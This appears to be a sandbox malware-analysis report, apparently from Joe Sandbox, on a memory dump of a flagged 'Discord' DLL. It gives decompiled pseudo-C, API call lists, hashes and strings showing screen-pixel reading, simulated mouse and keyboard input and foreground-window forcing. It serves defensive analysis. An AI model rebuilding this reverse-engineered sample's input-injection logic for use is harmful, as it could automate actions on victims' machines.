_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: 117a9570eac3a65f689d67cc3bfea1838abb242e1a1d0ee762ad9f22689837e6
Instruction ID: a259bd0550ff7ccef40704419954db147245b43eb9f7a2b178edaa13ebab2e54
Opcode Fuzzy Hash: 117a9570eac3a65f689d67cc3bfea1838abb242e1a1d0ee762ad9f22689837e6
Instruction Fuzzy Hash: 4B311BB4848A14CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB301A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8C02C Relevance: 22.6, APIs: 15, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E6DE8C02C() {
				intOrPtr _t31;
				intOrPtr _t32;
				intOrPtr _t46;
				intOrPtr _t63;
				void* _t64;
				intOrPtr* _t65;

				_t46 = _t31;
				_t63 = _t64 - 0xf4;
				while(1) {
					_t32 =  *((intOrPtr*)(_t64 - 0x174));
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t32);
					 *_t65 = _t46;
					L6DE8EBA0();
					_t46 = _t32;
					_t63 = _t64 - 0xf4;
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x144)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x148)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x14c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x150)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x154)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x158)));
					 *_t65 = _t63;
					L6DE8DD48();
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x160)) - 0xc);
					 *_t65 = _t63;
					L6DE8DD48();
					_push(_t61);
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x168)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x16c)));
					 *_t65 = _t63;
					L6DE8DD48();
					_push( *((intOrPtr*)(_t64 - 0x170)));
				}
			}

0x6de8c02c
0x6de8c02e
0x6de8bf83
0x6de8bf83
0x6de8bf89
0x6de8bf8f
0x6de8bf94
0x6de8bf95
0x6de8bf98
0x6de8bf9d
0x6de8bf9f
0x6de8be9f
0x6de8bea5
0x6de8beb1
0x6de8beb7
0x6de8bebc
0x6de8bec3
0x6de8bec9
0x6de8bece
0x6de8bed5
0x6de8bedb
0x6de8bee0
0x6de8bee7
0x6de8beed
0x6de8bef2
0x6de8bef9
0x6de8beff
0x6de8bf04
0x6de8bf0b
0x6de8bf11
0x6de8bf16
0x6de8bf1d
0x6de8bf23
0x6de8bf2f
0x6de8bf35
0x6de8bf3a
0x6de8bf41
0x6de8bf47
0x6de8bf4c
0x6de8bf53
0x6de8bf59
0x6de8bf5e
0x6de8bf65
0x6de8bf6b
0x6de8bf70
0x6de8bf77
0x6de8bf7d
0x6de8bf82
0x6de8bf82

APIs

_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEA5
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BEB7
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BEC9
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BEDB
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BEED
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BEFF
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF11
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF23
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF35
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF47
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000), ref: 6DE8BF59
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 6DE8BF6B
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 6DE8BF7D
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6(00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 6DE8BF8F
_Unwind_Resume.LIBGCC_S_DW2-1(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 6DE8BF98

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_disposeRep10_Ss4_$ResumeUnwind_
String ID:
API String ID: 6079418-0
Opcode ID: acde0fd57c78bab8279acc87ad1c7f2e20f2103e0e4b9a587087b5afc7376e28
Instruction ID: c15f7702d4c5c8e8bffb403a1a70f0c2e3a053a6066d02d8bd1da735f71703d7
Opcode Fuzzy Hash: acde0fd57c78bab8279acc87ad1c7f2e20f2103e0e4b9a587087b5afc7376e28
Instruction Fuzzy Hash: 33311BB4848A10CFC715DF14DD8899DF3F8EF98311F12869DA949EB261DB301A84CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6DE86259 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 52COMMON

Download Yara Rule

APIs

_Z3esTv.DFO1 ref: 6DE86266
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE86274
_ZNSsC1ERKSs.LIBSTDC++-6 ref: 6DE86288
_Z3C2MSsRSsS_S_S_Ri.DFO1 ref: 6DE862BB
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE862EF
_ZNSs4_Rep10_M_destroyERKSaIcE.LIBSTDC++-6 ref: 6DE8633A

Strings

Xm, xrefs: 6DE86173
Xm, xrefs: 6DE862B0
<m, xrefs: 6DE862A0
\m, xrefs: 6DE86290
@m, xrefs: 6DE862A8
Xm, xrefs: 6DE8624E
8m, xrefs: 6DE86298

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: M_destroyRep10_Ss4_$Ss7compareZ3es
String ID: 8m$<m$@m$Xm$Xm$Xm$\m
API String ID: 2963802390-3716002500
Opcode ID: 138579d84e76de4aca3b25a6c62149dd97e81d161e97e3a2334707db2c1ada14
Instruction ID: 452e87d47e8865a628bd1d4cb66d4e051f7c1bfee0b6cefd53868dae0f076885
Opcode Fuzzy Hash: 138579d84e76de4aca3b25a6c62149dd97e81d161e97e3a2334707db2c1ada14
Instruction Fuzzy Hash: 6F116A74A16B068FDB009F69954569DF7B0BF80624F21C92ED968AB242DF309506CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE87665 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272keyboardwindowCOMMON

Download Yara Rule

APIs

_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE86584
_Z6CEchapP6HWND__.DFO1 ref: 6DE8659C
GdipDisposeImage.GDIPLUS ref: 6DE865DC
GdipFree.GDIPLUS ref: 6DE865E7
_Z6Decre1P6HWND__ii.DFO1 ref: 6DE86639
GdipBitmapGetPixel.GDIPLUS ref: 6DE86736
IsWindowVisible.USER32 ref: 6DE875B8
MapVirtualKeyA.USER32 ref: 6DE875EE
MapVirtualKeyA.USER32 ref: 6DE8762A
SendInput.USER32 ref: 6DE87657
_ZNSs4_Rep10_M_disposeERKSaIcE.LIBSTDC++-6 ref: 6DE87679
_Unwind_Resume.LIBGCC_S_DW2-1 ref: 6DE87684
_Z4CCk1i.DPUB1 ref: 6DE8768C

Part of subcall function 6DE82740: GetWindowRect.USER32 ref: 6DE82759
Part of subcall function 6DE82740: GetWindowTextLengthA.USER32 ref: 6DE828AF
Part of subcall function 6DE82740: _Znaj.LIBSTDC++-6 ref: 6DE828BE
Part of subcall function 6DE82740: GetWindowTextA.USER32 ref: 6DE828D5
Part of subcall function 6DE82740: SetWindowPos.USER32 ref: 6DE82994
Part of subcall function 6DE82740: _Z21ForceForegroundWindowP6HWND__.DFO1 ref: 6DE829A5
Part of subcall function 6DE82740: Sleep.KERNEL32 ref: 6DE829BE
Part of subcall function 6DE82740: mouse_event.USER32 ref: 6DE829EA
Part of subcall function 6DE82740: Sleep.KERNEL32 ref: 6DE829FA
Part of subcall function 6DE82740: mouse_event.USER32 ref: 6DE82A26
Part of subcall function 6DE82740: Sleep.KERNEL32 ref: 6DE82A36

Strings

`m, xrefs: 6DE8657F

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: Window$GdipSleep$TextVirtualmouse_event$BitmapCk1iD__iiDecre1DisposeEchapForceForegroundFreeImageInputLengthM_disposePixelRectRep10_ResumeSendSs4_Ss7compareUnwind_VisibleZnaj
String ID: `m
API String ID: 2789768853-1637671290
Opcode ID: b7e6cdaa96d4a92307f3cdc06edf06c0d91eb7bcb73ee4c3c3e32f480ad7eea9
Instruction ID: 33940488b05aeefe159b11b1fa015b1b09972f553b0cc24d14b42a72cd5ac2a7
Opcode Fuzzy Hash: b7e6cdaa96d4a92307f3cdc06edf06c0d91eb7bcb73ee4c3c3e32f480ad7eea9
Instruction Fuzzy Hash: ACD14CB0E05669DFDB21AF55C944798BBB0FB44300F2188D6D88DB7255EB318EA4CF92

Uniqueness

Uniqueness Score: -1.00%

Function 6DE88690 Relevance: 18.2, APIs: 12, Instructions: 230
windowCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E6DE88690(void* __ebx, void* __edi, void* __esi) {
				signed int _t59;
				signed int _t63;
				intOrPtr _t68;
				signed int _t70;
				signed int _t71;
				signed int _t72;
				intOrPtr* _t73;
				signed int _t78;
				signed int _t83;
				intOrPtr _t89;
				signed int _t101;
				signed int _t102;
				signed int _t108;
				signed int _t109;
				signed int _t110;
				signed int _t112;
				signed int _t113;
				intOrPtr _t114;
				signed int _t115;
				signed int _t118;
				signed int _t123;
				signed int _t125;
				void* _t127;
				void* _t129;
				signed int* _t131;
				intOrPtr _t134;
				intOrPtr _t135;
				signed int _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				void* _t140;
				signed int* _t141;
				intOrPtr* _t142;
				intOrPtr* _t143;
				intOrPtr* _t145;

				_t123 = 0;
				_t141 = _t140 - 0x4c;
				 *0x6de9e568 = 0;
				_t101 =  &(_t141[0xb]);
				_t131 =  &(_t141[0xc]);
				_t141[0xb] = 0xff000000;
				_t141[0xc] = 0xff000000;
				 *0x6de9e7b8 =  *0x6de9e7b4;
				goto L1;
				do {
					do {
						do {
							L1:
							_t141[0xd] = 0;
							_t59 = 0;
							while(1) {
								_t141[2] = _t59;
								_t134 =  *0x6de9e8e0;
								_t141[3] = _t101;
								_t141[1] =  *0x6de9e884 -  *0x6de9e87c - _t123;
								_t63 =  *(_t134 + 4);
								 *_t141 = _t63;
								L6DE8DC50();
								_t142 = _t141 - 0x10;
								if(_t63 != 0) {
									 *(_t134 + 8) = _t63;
								}
								_t135 =  *0x6de9e8dc;
								 *(_t142 + 0xc) = _t131;
								 *((intOrPtr*)(_t142 + 8)) =  *((intOrPtr*)(_t142 + 0x34));
								 *((intOrPtr*)(_t142 + 4)) =  *0x6de9e884 -  *0x6de9e87c - _t123;
								_t68 =  *((intOrPtr*)(_t135 + 4));
								 *_t142 = _t68;
								L6DE8DC50();
								_t141 = _t142 - 0x10;
								if(_t68 != 0) {
									 *((intOrPtr*)(_t135 + 8)) = _t68;
								}
								_t70 = _t141[0xd];
								if(_t141[0xc] != _t141[0xb] && _t70 > 0x32) {
									break;
								}
								_t59 = _t70 + 1;
								_t141[0xd] = _t59;
								if(_t59 <= 0x12c) {
									continue;
								} else {
									goto L9;
								}
								goto L10;
							}
							_t110 =  *0x6de9e7b8;
							if(_t110 ==  *0x6de9e7bc) {
								goto L36;
							} else {
								goto L32;
							}
							break;
							L9:
							_t123 = _t123 + 1;
						} while (_t123 != 0x65);
						L10:
						_t71 =  *0x6de9e7b4;
						_t136 = 0;
						_t141[0xd] = 0;
						_t141[0xe] = 0;
						_t141[0xf] = 0;
						_t141[7] = _t71;
						_t72 =  *0x6de9e7b8;
						_t125 = _t72 - _t71;
						_t112 = _t125 >> 2;
						if(_t112 != 0) {
							if(_t112 > 0x3fffffff) {
								L6DE8DDB8();
								_t113 = _t141[0xd];
								_t102 = _t72;
								if(_t113 != 0) {
									 *_t141 = _t113;
									L6DE8DD20();
								}
								 *_t141 = _t102;
								L6DE8EBA0();
								_t143 = _t141 - 0x1c;
								_t73 =  *0x6de9e800;
								if(_t73 ==  *0x6de9e804) {
									 *_t143 = _t143 + 0x20;
									E6DE94FA0(0x6de9e7fc);
									_t143 = _t143 - 4;
								} else {
									_t114 =  *((intOrPtr*)(_t143 + 0x20));
									if(_t73 != 0) {
										 *_t73 = _t114;
										_t73 =  *0x6de9e800;
									}
									 *0x6de9e800 = _t73 + 4;
								}
								return 1;
							} else {
								 *_t141 = _t125;
								L6DE8DDA8();
								_t136 = _t72;
								_t72 =  *0x6de9e7b8;
								_t141[7] =  *0x6de9e7b4;
								goto L11;
							}
						} else {
							L11:
							_t108 = _t141[7];
							_t141[0xd] = _t136;
							_t141[0xe] = _t136;
							_t141[0xf] = _t125 + _t136;
							if(_t72 != _t108) {
								_t118 = _t108;
								_t109 = _t136;
								do {
									_t129 =  *_t118;
									if(_t109 != 0) {
										 *_t109 = _t129;
									}
									_t118 = _t118 + 4;
									_t109 = _t109 + 4;
								} while (_t72 != _t118);
								_t136 = _t136 + 4 + (_t72 - _t141[7] + 4 >> 2) * 4;
							}
							_t78 =  &(_t141[0xd]);
							_t141[1] = 0x14;
							_t141[0xe] = _t136;
							 *_t141 = _t78;
							L6DE8DCC0();
							_t115 = _t141[0xd];
							 *0x6de9e568 = _t78;
							if(_t115 != 0) {
								 *_t141 = _t115;
								L6DE8DD20();
								_t78 =  *0x6de9e568;
							}
							if(_t78 == 0) {
								 *0x6de9e568 = 0x46;
								_t78 = 0x46;
							}
							 *0x6de9e570 = 0;
							_t127 = 0;
							 *0x6de9e7b8 =  *0x6de9e7b4;
							while(1) {
								_t137 =  *0x6de9e8e0;
								_t141[3] = _t101;
								_t141[2] = _t78 + 2;
								_t40 =  *0x6de9e884 -  *0x6de9e87c - 0x32; // -51
								_t141[1] = _t127 + _t40;
								_t83 =  *(_t137 + 4);
								 *_t141 = _t83;
								L6DE8DC50();
								_t145 = _t141 - 0x10;
								if(_t83 != 0) {
									 *(_t137 + 8) = _t83;
								}
								_t138 =  *0x6de9e8e0;
								 *(_t145 + 0xc) = _t131;
								 *((intOrPtr*)(_t145 + 8)) =  *0x6de9e568 + 2;
								_t47 =  *0x6de9e884 -  *0x6de9e87c - 0x33; // -52
								 *((intOrPtr*)(_t145 + 4)) = _t127 + _t47;
								_t89 =  *((intOrPtr*)(_t138 + 4));
								 *_t145 = _t89;
								L6DE8DC50();
								_t141 = _t145 - 0x10;
								if(_t89 != 0) {
									 *((intOrPtr*)(_t138 + 8)) = _t89;
								}
								if(_t141[0xb] != _t141[0xc]) {
									break;
								}
								if(_t127 == 0x32) {
									 *0x6de9e570 = 5;
								} else {
									_t78 =  *0x6de9e568;
									_t127 = _t127 + 1;
									continue;
								}
								L30:
								 *0x6de9e7b8 =  *0x6de9e7b4;
								return 1;
								goto L50;
							}
							_t95 =  ==  ? 0x19 : 0x32 - _t127;
							 *0x6de9e570 =  ==  ? 0x19 : 0x32 - _t127;
							goto L30;
						}
						L50:
						L36:
						_t123 = _t123 + 1;
						 *_t141 =  &(_t141[0xd]);
						E6DE950A0(0x6de9e7b4);
						_t141 = _t141 - 4;
					} while (_t123 != 0x65);
					goto L10;
					L32:
					if(_t110 != 0) {
						 *_t110 = _t70;
					}
					_t123 = _t123 + 1;
					 *0x6de9e7b8 = _t110 + 4;
				} while (_t123 != 0x65);
				goto L10;
			}

0x6de88692
0x6de88696
0x6de8869e
0x6de886a8
0x6de886ac
0x6de886b0
0x6de886b8
0x6de886c0
0x6de886c0
0x6de886c5
0x6de886c5
0x6de886c5
0x6de886c5
0x6de886c5
0x6de886cd
0x6de886d0
0x6de886d0
0x6de886df
0x6de886e5
0x6de886eb
0x6de886ef
0x6de886f2
0x6de886f5
0x6de886fa
0x6de886ff
0x6de88701
0x6de88701
0x6de88708
0x6de8870e
0x6de88712
0x6de88723
0x6de88727
0x6de8872a
0x6de8872d
0x6de88732
0x6de88737
0x6de88739
0x6de88739
0x6de88744
0x6de88748
0x00000000
0x00000000
0x6de88753
0x6de8875b
0x6de8875f
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de8875f
0x6de88905
0x6de88911
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6de88765
0x6de88765
0x6de88768
0x6de88771
0x6de88771
0x6de88776
0x6de88778
0x6de88780
0x6de88788
0x6de88792
0x6de88796
0x6de8879d
0x6de887a1
0x6de887a6
0x6de88966
0x6de88995
0x6de8899a
0x6de8899e
0x6de889a2
0x6de889a4
0x6de889a7
0x6de889a7
0x6de889ac
0x6de889af
0x6de889c0
0x6de889c3
0x6de889ce
0x6de889fb
0x6de889fe
0x6de88a03
0x6de889d0
0x6de889d2
0x6de889d6
0x6de889d8
0x6de889da
0x6de889da
0x6de889e2
0x6de889e2
0x6de889ef
0x6de88968
0x6de88968
0x6de8896b
0x6de88976
0x6de88978
0x6de8897d
0x00000000
0x6de8897d
0x6de887ac
0x6de887ac
0x6de887ac
0x6de887b2
0x6de887b6
0x6de887ba
0x6de887c0
0x6de887c2
0x6de887c4
0x6de887c6
0x6de887c8
0x6de887ca
0x6de887cc
0x6de887cc
0x6de887ce
0x6de887d1
0x6de887d4
0x6de887e4
0x6de887e4
0x6de887e8
0x6de887ec
0x6de887f4
0x6de887f8
0x6de887fb
0x6de88800
0x6de88804
0x6de8880b
0x6de8880d
0x6de88810
0x6de88815
0x6de88815
0x6de8881c
0x6de8881e
0x6de88828
0x6de88828
0x6de88830
0x6de8883a
0x6de8883c
0x6de88855
0x6de88858
0x6de8885e
0x6de88862
0x6de88871
0x6de88875
0x6de88879
0x6de8887c
0x6de8887f
0x6de88884
0x6de88889
0x6de8888b
0x6de8888b
0x6de88893
0x6de88899
0x6de888a0
0x6de888af
0x6de888b3
0x6de888b7
0x6de888ba
0x6de888bd
0x6de888c2
0x6de888c7
0x6de888c9
0x6de888c9
0x6de888d4
0x00000000
0x00000000
0x6de88847
0x6de88986
0x6de8884d
0x6de8884d
0x6de88852
0x00000000
0x6de88852
0x6de888ee
0x6de888f3
0x6de88904
0x00000000
0x6de88904
0x6de888e6
0x6de888e9
0x00000000
0x6de888e9
0x00000000
0x6de88933
0x6de8893c
0x6de8893f
0x6de88942
0x6de88947
0x6de8894a
0x00000000
0x6de88913
0x6de88915
0x6de88917
0x6de88917
0x6de88919
0x6de88922
0x6de88922
0x00000000

APIs

GdipBitmapGetPixel.GDIPLUS ref: 6DE886F5
GdipBitmapGetPixel.GDIPLUS ref: 6DE8872D
_Z6MaxNumSt6vectorIiSaIiEEi.DFO1 ref: 6DE887FB
_ZdlPv.LIBSTDC++-6 ref: 6DE88810
GdipBitmapGetPixel.GDIPLUS ref: 6DE8887F
GdipBitmapGetPixel.GDIPLUS ref: 6DE888BD
_ZNSt6vectorIiSaIiEE19_M_emplace_back_auxIIRKiEEEvDpOT_.DPUB1 ref: 6DE88942

Memory Dump Source

Source File: 0000000E.00000002.773274277.000000006DE81000.00000020.00000001.01000000.00000011.sdmp, Offset: 6DE80000, based on PE: true

Associated: 0000000E.00000002.773235506.000000006DE80000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773731794.000000006DE98000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773858798.000000006DEA0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773904781.000000006DEA2000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773935086.000000006DEA3000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773970013.000000006DEA6000.00000008.00000001.01000000.00000011.sdmpDownload File
Associated: 0000000E.00000002.773994047.000000006DEA7000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6de80000_Discord .jbxd

Similarity

API ID: BitmapGdipPixel$St6vector$E19_M_emplace_back_aux
String ID:
API String ID: 3347750445-0
Opcode ID: 309659e9778fc99dac21f8c0845eb4feafc08e1cf3b9d5fdb4aeb132c3ab82af
Instruction ID: 8f2c9c5f7e393f3445085333aaa7d9aadeb609159068098c626ee045b4c001b8
Opcode Fuzzy Hash: 309659e9778fc99dac21f8c0845eb4feafc08e1cf3b9d5fdb4aeb132c3ab82af
Instruction Fuzzy Hash: 36A15CB590A7029FDB00DF28D58471A7BF1FB85708F65892EEA58DB345EB30E841CB42

Uniqueness

Uniqueness Score: -1.00%

Function 6DE8604C Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 85COMMON

Download Yara Rule

APIs

GetCursorPos.USER32 ref: 6DE8606C
GdipDisposeImage.GDIPLUS ref: 6DE860CA
GdipFree.GDIPLUS ref: 6DE860D5
GdipDisposeImage.GDIPLUS ref: 6DE86121
GdipFree.GDIPLUS ref: 6DE8612C
_ZNKSs7compareEPKc.LIBSTDC++-6 ref: 6DE86154

Strings

Xm, xrefs: 6DE86173
x, xrefs: 6DE860F4
